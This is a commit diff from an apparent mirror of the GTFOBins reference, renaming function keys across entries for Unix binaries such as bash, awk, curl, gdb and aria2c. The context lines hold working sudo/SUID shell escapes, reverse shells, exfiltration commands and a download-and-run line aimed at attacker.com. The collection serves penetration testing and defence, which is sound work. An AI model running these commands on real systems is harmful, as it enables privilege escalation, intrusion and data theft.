daffainfo
/
GTFOBins.github.io
mirror of https://github.com/daffainfo/GTFOBins.github.io.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Adopt new function names

master
Emilio Pinna 2018-10-05 18:55:38 +01:00
parent 1c77f099d3
commit dd337b5ddf
110 changed files with 354 additions and 354 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
_data/functions.yml
View File

@ -4,13 +4,13 @@
shell: shell:
label: Shell label: Shell
description: | description: |
It can be used to break out from restricted environments by spawning an It can be used to break out from restricted environments by spawning an
interactive system shell. interactive system shell.
command: command:
label: Command label: Command
description: | description: |
It can be used to break out from restricted environments by running It can be used to break out from restricted environments by running
non-interactive system commands. non-interactive system commands.
reverse-shell: reverse-shell:
@ -19,8 +19,8 @@ reverse-shell:
It can send back a reverse shell to a listening attacker to open a remote It can send back a reverse shell to a listening attacker to open a remote
network access. network access.
reverse-non-interactive-shell: non-interactive-reverse-shell:
label: Reverse non-interactive shell label: Non-interactive reverse shell
description: | description: |
It can send back a non-interactive reverse shell to a listening attacker to It can send back a non-interactive reverse shell to a listening attacker to
open a remote network access. open a remote network access.
@ -30,8 +30,8 @@ bind-shell:
description: | description: |
It can bind a shell to a local port to allow remote network access. It can bind a shell to a local port to allow remote network access.
bind-non-interactive-shell: non-interactive-bind-shell:
label: Bind non-interactive shell label: Non-interactive bind shell
description: | description: |
It can bind a non-interactive shell to a local port to allow remote network It can bind a non-interactive shell to a local port to allow remote network
access. access.

4
_gtfobins/apt-get.md
View File

@ -1,11 +1,11 @@
--- ---
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
functions: functions:
execute-interactive: shell:
- code: | - code: |
apt-get changelog apt apt-get changelog apt
!/bin/sh !/bin/sh
sudo-enabled: sudo:
- code: | - code: |
sudo apt-get changelog apt sudo apt-get changelog apt
!/bin/sh !/bin/sh

4
_gtfobins/apt.md
View File

@ -1,11 +1,11 @@
--- ---
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
functions: functions:
execute-interactive: shell:
- code: | - code: |
apt-get changelog apt apt-get changelog apt
!/bin/sh !/bin/sh
sudo-enabled: sudo:
- code: | - code: |
sudo apt-get changelog apt sudo apt-get changelog apt
!/bin/sh !/bin/sh

6
_gtfobins/aria2c.md
View File

@ -1,7 +1,7 @@
--- ---
description: Note that the subprocess is immediately sent to the background. description: Note that the subprocess is immediately sent to the background.
functions: functions:
execute-non-interactive: command:
- code: | - code: |
COMMAND='id' COMMAND='id'
TF=$(mktemp) TF=$(mktemp)
@ -10,14 +10,14 @@ functions:
aria2c --on-download-error=$TF http://x aria2c --on-download-error=$TF http://x
- description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID. - description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
suid-enabled: suid:
- code: | - code: |
COMMAND='id' COMMAND='id'
TF=$(mktemp) TF=$(mktemp)
echo "$COMMAND" > $TF echo "$COMMAND" > $TF
chmod +x $TF chmod +x $TF
./aria2c --on-download-error=$TF http://x ./aria2c --on-download-error=$TF http://x
sudo-enabled: sudo:
- code: | - code: |
COMMAND='id' COMMAND='id'
TF=$(mktemp) TF=$(mktemp)

6
_gtfobins/ash.md
View File

@ -1,13 +1,13 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: ash - code: ash
file-write: file-write:
- code: | - code: |
export LFILE=file_to_write export LFILE=file_to_write
ash -c 'echo DATA > $LFILE' ash -c 'echo DATA > $LFILE'
suid-enabled: suid:
- code: "./ash" - code: "./ash"
sudo-enabled: sudo:
- code: sudo ash - code: sudo ash
--- ---

10
_gtfobins/awk.md
View File

@ -1,8 +1,8 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: awk 'BEGIN {system("/bin/sh")}' - code: awk 'BEGIN {system("/bin/sh")}'
reverse-shell-non-interactive: non-interactive-reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
@ -11,7 +11,7 @@ functions:
s = "/inet/tcp/0/" RHOST "/" RPORT; s = "/inet/tcp/0/" RHOST "/" RPORT;
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
bind-shell-non-interactive: non-interactive-bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: | code: |
LPORT=12345 LPORT=12345
@ -27,8 +27,8 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
awk '//' "$LFILE" awk '//' "$LFILE"
sudo-enabled: sudo:
- code: sudo awk 'BEGIN {system("/bin/sh")}' - code: sudo awk 'BEGIN {system("/bin/sh")}'
suid-limited: limited-suid:
- code: ./awk 'BEGIN {system("/bin/sh")}' - code: ./awk 'BEGIN {system("/bin/sh")}'
--- ---

4
_gtfobins/base64.md
View File

@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
base64 "$LFILE" | base64 --decode base64 "$LFILE" | base64 --decode
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./base64 "$LFILE" | base64 --decode ./base64 "$LFILE" | base64 --decode
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo base64 "$LFILE" | base64 --decode sudo base64 "$LFILE" | base64 --decode

12
_gtfobins/bash.md
View File

@ -1,14 +1,14 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: bash - code: bash
reverse-shell-interactive: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1' bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
upload: file-upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@ -21,7 +21,7 @@ functions:
export RPORT=12345 export RPORT=12345
export LFILE=file_to_send export LFILE=file_to_send
bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
download: file-download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@ -58,8 +58,8 @@ functions:
HISTTIMEFORMAT=$'\r\e[K' HISTTIMEFORMAT=$'\r\e[K'
history -r $LFILE history -r $LFILE
history history
suid-enabled: suid:
- code: "./bash -p" - code: "./bash -p"
sudo-enabled: sudo:
- code: sudo bash - code: sudo bash
--- ---

8
_gtfobins/busybox.md
View File

@ -1,9 +1,9 @@
--- ---
description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example. description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example.
functions: functions:
execute-interactive: shell:
- code: busybox sh - code: busybox sh
upload: file-upload:
- description: Serve files in the local folder running an HTTP server. - description: Serve files in the local folder running an HTTP server.
code: | code: |
export LPORT=12345 export LPORT=12345
@ -16,9 +16,9 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./busybox cat "$LFILE" ./busybox cat "$LFILE"
suid-enabled: suid:
- description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration. - description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
code: "./busybox sh" code: "./busybox sh"
sudo-enabled: sudo:
- code: sudo busybox sh - code: sudo busybox sh
--- ---

4
_gtfobins/cat.md
View File

@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
cat "$LFILE" cat "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./cat "$LFILE" ./cat "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo cat "$LFILE" sudo cat "$LFILE"

4
_gtfobins/chmod.md
View File

@ -1,11 +1,11 @@
--- ---
description: This can be run with elevated privileges to change permissions and then read, write, or execute a file. description: This can be run with elevated privileges to change permissions and then read, write, or execute a file.
functions: functions:
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_change LFILE=file_to_change
./chmod 0777 $LFILE ./chmod 0777 $LFILE
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_change LFILE=file_to_change
sudo chmod 0777 $LFILE sudo chmod 0777 $LFILE

4
_gtfobins/chown.md
View File

@ -1,11 +1,11 @@
--- ---
description: This can be run with elevated privileges to change ownership and then read, write, or execute a file. description: This can be run with elevated privileges to change ownership and then read, write, or execute a file.
functions: functions:
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_change LFILE=file_to_change
./chown $(id -un):$(id -gn) $LFILE ./chown $(id -un):$(id -gn) $LFILE
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_change LFILE=file_to_change
sudo chown $(id -un):$(id -gn) $LFILE sudo chown $(id -un):$(id -gn) $LFILE

4
_gtfobins/cp.md
View File

@ -1,13 +1,13 @@
--- ---
description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.
functions: functions:
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
TF=$(mktemp) TF=$(mktemp)
echo "DATA" > $TF echo "DATA" > $TF
./cp $TF $LFILE ./cp $TF $LFILE
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
TF=$(mktemp) TF=$(mktemp)

4
_gtfobins/cpulimit.md
View File

@ -1,7 +1,7 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: cpulimit -l 100 -f /bin/sh - code: cpulimit -l 100 -f /bin/sh
sudo-enabled: sudo:
- code: sudo cpulimit -l 100 -f /bin/sh - code: sudo cpulimit -l 100 -f /bin/sh
--- ---

4
_gtfobins/crontab.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-non-interactive: command:
- description: The commands are executed according to the crontab file edited via the `crontab` utility. - description: The commands are executed according to the crontab file edited via the `crontab` utility.
code: crontab -e code: crontab -e
sudo-enabled: sudo:
- description: The commands are executed according to the crontab file edited via the `crontab` utility. - description: The commands are executed according to the crontab file edited via the `crontab` utility.
code: sudo crontab -e code: sudo crontab -e
--- ---

6
_gtfobins/csh.md
View File

@ -1,13 +1,13 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: csh - code: csh
file-write: file-write:
- code: | - code: |
export LFILE=file_to_write export LFILE=file_to_write
ash -c 'echo DATA > $LFILE' ash -c 'echo DATA > $LFILE'
suid-enabled: suid:
- code: "./csh -b" - code: "./csh -b"
sudo-enabled: sudo:
- code: sudo csh - code: sudo csh
--- ---

8
_gtfobins/curl.md
View File

@ -1,12 +1,12 @@
--- ---
functions: functions:
upload: file-upload:
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data. - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data.
code: | code: |
URL=http://attacker.com/ URL=http://attacker.com/
LFILE=file_to_send LFILE=file_to_send
curl -X POST -d @$file_to_send $URL curl -X POST -d @$file_to_send $URL
download: file-download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
URL=http://attacker.com/file_to_get URL=http://attacker.com/file_to_get
@ -17,13 +17,13 @@ functions:
code: | code: |
LFILE=/tmp/file_to_read LFILE=/tmp/file_to_read
curl file://$LFILE curl file://$LFILE
suid-enabled: suid:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
URL=http://attacker.com/file_to_get URL=http://attacker.com/file_to_get
LFILE=file_to_save LFILE=file_to_save
./curl $URL -o $LFILE ./curl $URL -o $LFILE
sudo-enabled: sudo:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
URL=http://attacker.com/file_to_get URL=http://attacker.com/file_to_get

4
_gtfobins/cut.md
View File

@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
cut -d "" -f1 "$LFILE" cut -d "" -f1 "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./cut -d "" -f1 "$LFILE" ./cut -d "" -f1 "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo cut -d "" -f1 "$LFILE" sudo cut -d "" -f1 "$LFILE"

6
_gtfobins/dash.md
View File

@ -1,13 +1,13 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: dash - code: dash
file-write: file-write:
- code: | - code: |
export LFILE=file_to_write export LFILE=file_to_write
ash -c 'echo DATA > $LFILE' ash -c 'echo DATA > $LFILE'
suid-enabled: suid:
- code: ./dash -p - code: ./dash -p
sudo-enabled: sudo:
- code: sudo dash - code: sudo dash
--- ---

4
_gtfobins/date.md
View File

@ -8,11 +8,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
date -f $LFILE date -f $LFILE
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./date -f $LFILE ./date -f $LFILE
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo date -f $LFILE sudo date -f $LFILE

4
_gtfobins/dd.md
View File

@ -8,11 +8,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
dd if=LFILE dd if=LFILE
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo "data" | ./dd of=$LFILE echo "data" | ./dd of=$LFILE
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo "data" | sudo -E dd of=$LFILE echo "data" | sudo -E dd of=$LFILE

4
_gtfobins/diff.md
View File

@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
diff --line-format=%L /dev/null $LFILE diff --line-format=%L /dev/null $LFILE
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./diff --line-format=%L /dev/null $LFILE ./diff --line-format=%L /dev/null $LFILE
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo diff --line-format=%L /dev/null $LFILE sudo diff --line-format=%L /dev/null $LFILE

4
_gtfobins/docker.md
View File

@ -2,11 +2,11 @@
description: | description: |
Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, e.g. being in the `docker` group. Any other Docker Linux image should work, e.g., `debian`. Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, e.g. being in the `docker` group. Any other Docker Linux image should work, e.g., `debian`.
functions: functions:
sudo-enabled: sudo:
- code: | - code: |
sudo docker run --rm -v /home/$USER:/h_docs ubuntu \ sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
suid-enabled: suid:
- code: | - code: |
./docker run --rm -v /home/$USER:/h_docs ubuntu \ ./docker run --rm -v /home/$USER:/h_docs ubuntu \
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p

12
_gtfobins/easy_install.md
View File

@ -1,11 +1,11 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
TF=$(mktemp -d) TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
easy_install $TF easy_install $TF
reverse-shell-interactive: reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@ -16,7 +16,7 @@ functions:
[os.dup2(s.fileno(),fd) for fd in (0,1,2)] [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")' > $TF/setup.py pty.spawn("/bin/sh")' > $TF/setup.py
easy_install $TF easy_install $TF
upload: file-upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: | code: |
export URL=http://attacker.com/ export URL=http://attacker.com/
@ -36,7 +36,7 @@ functions:
else: import SimpleHTTPServer as s, SocketServer as ss else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
easy_install $TF easy_install $TF
download: file-download:
- description: Fetch a remote file via HTTP GET request. The file path must be absolute. - description: Fetch a remote file via HTTP GET request. The file path must be absolute.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
@ -62,12 +62,12 @@ functions:
TF=$(mktemp -d) TF=$(mktemp -d)
echo 'print(open("file_to_read").read())' > $TF/setup.py echo 'print(open("file_to_read").read())' > $TF/setup.py
easy_install $TF easy_install $TF
load-library: library-load:
- code: | - code: |
TF=$(mktemp -d) TF=$(mktemp -d)
echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py
easy_install $TF easy_install $TF
sudo-enabled: sudo:
- code: | - code: |
TF=$(mktemp -d) TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py

6
_gtfobins/ed.md
View File

@ -1,6 +1,6 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
ed ed
!/bin/sh !/bin/sh
@ -17,11 +17,11 @@ functions:
ed file_to_read ed file_to_read
,p ,p
q q
sudo-enabled: sudo:
- code: | - code: |
sudo ed sudo ed
!/bin/sh !/bin/sh
suid-limited: limited-suid:
- code: | - code: |
./ed ./ed
!/bin/sh !/bin/sh

6
_gtfobins/emacs.md
View File

@ -1,6 +1,6 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: emacs -Q -nw --eval '(term "/bin/sh")' - code: emacs -Q -nw --eval '(term "/bin/sh")'
file-write: file-write:
- code: | - code: |
@ -9,8 +9,8 @@ functions:
C-x C-s C-x C-s
file-read: file-read:
- code: emacs file_to_read - code: emacs file_to_read
suid-enabled: suid:
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")' - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
sudo-enabled: sudo:
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")' - code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
--- ---

6
_gtfobins/env.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: env /bin/sh - code: env /bin/sh
suid-enabled: suid:
- code: ./env /bin/sh -p - code: ./env /bin/sh -p
sudo-enabled: sudo:
- code: sudo env /bin/sh - code: sudo env /bin/sh
--- ---

4
_gtfobins/expand.md
View File

@ -5,11 +5,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
expand "$LFILE" expand "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./expand "$LFILE" ./expand "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo expand "$LFILE" sudo expand "$LFILE"

6
_gtfobins/expect.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: expect -c 'spawn /bin/sh;interact' - code: expect -c 'spawn /bin/sh;interact'
suid-enabled: suid:
- code: ./expect -c 'spawn /bin/sh -p;interact' - code: ./expect -c 'spawn /bin/sh -p;interact'
sudo-enabled: sudo:
- code: sudo expect -c 'spawn /bin/sh;interact' - code: sudo expect -c 'spawn /bin/sh;interact'
--- ---

4
_gtfobins/facter.md
View File

@ -1,11 +1,11 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
TF=$(mktemp -d) TF=$(mktemp -d)
echo 'exec("/bin/sh")' > $TF/x.rb echo 'exec("/bin/sh")' > $TF/x.rb
FACTERLIB=$TF facter FACTERLIB=$TF facter
sudo-enabled: sudo:
- code: | - code: |
TF=$(mktemp -d) TF=$(mktemp -d)
echo 'exec("/bin/sh")' > $TF/x.rb echo 'exec("/bin/sh")' > $TF/x.rb

6
_gtfobins/find.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: find . -exec /bin/sh \; -quit - code: find . -exec /bin/sh \; -quit
suid-enabled: suid:
- code: ./find . -exec /bin/sh -p \; -quit - code: ./find . -exec /bin/sh -p \; -quit
sudo-enabled: sudo:
- code: sudo find . -exec /bin/sh \; -quit - code: sudo find . -exec /bin/sh \; -quit
--- ---

4
_gtfobins/finger.md
View File

@ -2,13 +2,13 @@
description: | description: |
`finger` hangs waiting for the remote peer to close the socket. `finger` hangs waiting for the remote peer to close the socket.
functions: functions:
upload: file-upload:
- description: Send a binary file to a TCP port. Run `sudo nc -l -p 79 | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments. - description: Send a binary file to a TCP port. Run `sudo nc -l -p 79 | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
LFILE=file_to_send LFILE=file_to_send
finger "$(base64 $LFILE)@$RHOST" finger "$(base64 $LFILE)@$RHOST"
download: file-download:
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | sudo nc -l -p 79` on the attacker box to send the file. - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | sudo nc -l -p 79` on the attacker box to send the file.
code: | code: |
RHOST=attacker.com RHOST=attacker.com

6
_gtfobins/flock.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: flock -u / /bin/sh - code: flock -u / /bin/sh
suid-enabled: suid:
- code: ./flock -u / /bin/sh -p - code: ./flock -u / /bin/sh -p
sudo-enabled: sudo:
- code: sudo flock -u / /bin/sh - code: sudo flock -u / /bin/sh
--- ---

4
_gtfobins/fmt.md
View File

@ -5,11 +5,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
fmt -pNON_EXISTING_PREFIX "$LFILE" fmt -pNON_EXISTING_PREFIX "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./fmt -pNON_EXISTING_PREFIX "$LFILE" ./fmt -pNON_EXISTING_PREFIX "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo fmt -pNON_EXISTING_PREFIX "$LFILE" sudo fmt -pNON_EXISTING_PREFIX "$LFILE"

4
_gtfobins/fold.md
View File

@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
fold -w99999999 "$LFILE" fold -w99999999 "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./fold -w99999999 "$LFILE" ./fold -w99999999 "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo fold -w99999999 "$LFILE" sudo fold -w99999999 "$LFILE"

8
_gtfobins/ftp.md
View File

@ -1,22 +1,22 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
ftp ftp
!/bin/sh !/bin/sh
upload: file-upload:
- description: Send local file to a FTP server. - description: Send local file to a FTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
ftp $RHOST ftp $RHOST
put file_to_send put file_to_send
download: file-download:
- description: Fetch a remote file from a FTP server. - description: Fetch a remote file from a FTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
ftp $RHOST ftp $RHOST
get file_to_get get file_to_get
sudo-enabled: sudo:
- code: | - code: |
sudo ftp sudo ftp
!/bin/sh !/bin/sh

14
_gtfobins/gdb.md
View File

@ -1,8 +1,8 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: gdb -nx -ex '!sh' -ex quit - code: gdb -nx -ex '!sh' -ex quit
reverse-shell-interactive: reverse-shell:
- description: This requires that GDB is compiled with Python support. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. - description: This requires that GDB is compiled with Python support. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@ -11,7 +11,7 @@ functions:
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)] [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")' -ex quit pty.spawn("/bin/sh")' -ex quit
upload: file-upload:
- description: This requires that GDB is compiled with Python support. Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. - description: This requires that GDB is compiled with Python support. Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: | code: |
export URL=http://attacker.com/ export URL=http://attacker.com/
@ -27,7 +27,7 @@ functions:
if sys.version_info.major == 3: import http.server as s, socketserver as ss if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit
download: file-download:
- description: This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request. - description: This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
@ -44,12 +44,12 @@ functions:
file-read: file-read:
- description: This requires that GDB is compiled with Python support. - description: This requires that GDB is compiled with Python support.
code: gdb -nx -ex 'python print(open("file_to_read").read())' -ex quit code: gdb -nx -ex 'python print(open("file_to_read").read())' -ex quit
load-library: library-load:
- description: This requires that GDB is compiled with Python support. - description: This requires that GDB is compiled with Python support.
code: gdb -nx -ex 'python from ctypes import cdll; cdll.LoadLibrary("lib.so")' -ex quit code: gdb -nx -ex 'python from ctypes import cdll; cdll.LoadLibrary("lib.so")' -ex quit
sudo-enabled: sudo:
- code: sudo gdb -nx -ex '!sh' -ex quit - code: sudo gdb -nx -ex '!sh' -ex quit
capabilities-enabled: capabilities:
- description: This requires that GDB is compiled with Python support. - description: This requires that GDB is compiled with Python support.
code: ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit code: ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
--- ---

6
_gtfobins/git.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: PAGER='sh -c "exec sh 0<&1"' git -p help - code: PAGER='sh -c "exec sh 0<&1"' git -p help
sudo-enabled: sudo:
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help - code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
suid-limited: limited-suid:
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help - code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
--- ---

4
_gtfobins/grep.md
View File

@ -6,11 +6,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
grep '' $LFILE grep '' $LFILE
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./grep '' $LFILE ./grep '' $LFILE
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
